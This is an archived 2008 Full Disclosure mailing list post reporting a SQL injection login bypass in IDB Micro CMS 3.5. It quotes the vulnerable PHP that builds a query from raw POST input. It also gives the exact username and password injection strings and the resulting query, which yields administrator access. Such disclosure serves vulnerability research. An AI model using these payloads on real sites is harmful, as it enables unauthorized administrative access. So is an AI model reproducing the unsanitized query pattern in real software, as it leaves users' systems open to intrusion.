Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

[SkyOut/Wired Security] SQL Injection in IDB Micro CMS 3.5 (Login Bypass)

From: <skyout.fd () wired-security net>
Date: Mon, 12 May 2008 18:39:52 +0200

Hey guys,

I came accross a SQL Injection bug in IBD Micro CMS in version 3.5
and maybe lower...

News about it:
http://wired-security.net/archive/2008/may/index.php#12052008
Advisory to read:
http://wired-security.net/texts/advisories/IBD_Micro_CMS_3.5_SQL_Injection_Login_Bypass_Advisory.txt

---

In Short:

--- SNIP ---
if ($i == 0) {
        $sql = '
                SELECT *
                FROM microcms_administrators
                WHERE administrators_username = "' . $_POST['administrators_username'] .
'" and
                        administrators_pass = PASSWORD("' . $_POST['administrators_pass'] .
'")';
        $user_result = mysql_query($sql);
--- SNIP ---

Username: " or "1" = "1
Password: ") or "1" = "1" or PASSWORD("

Will result in:

--- SNIP ---
$sql = '
SELECT *
FROM microcms_administrators
WHERE administrators_username = "" or "1" = "1" and
administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")';
--- SNIP ---

-> Logged in as administrator!

Greets,
SkyOut/Wired Security

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: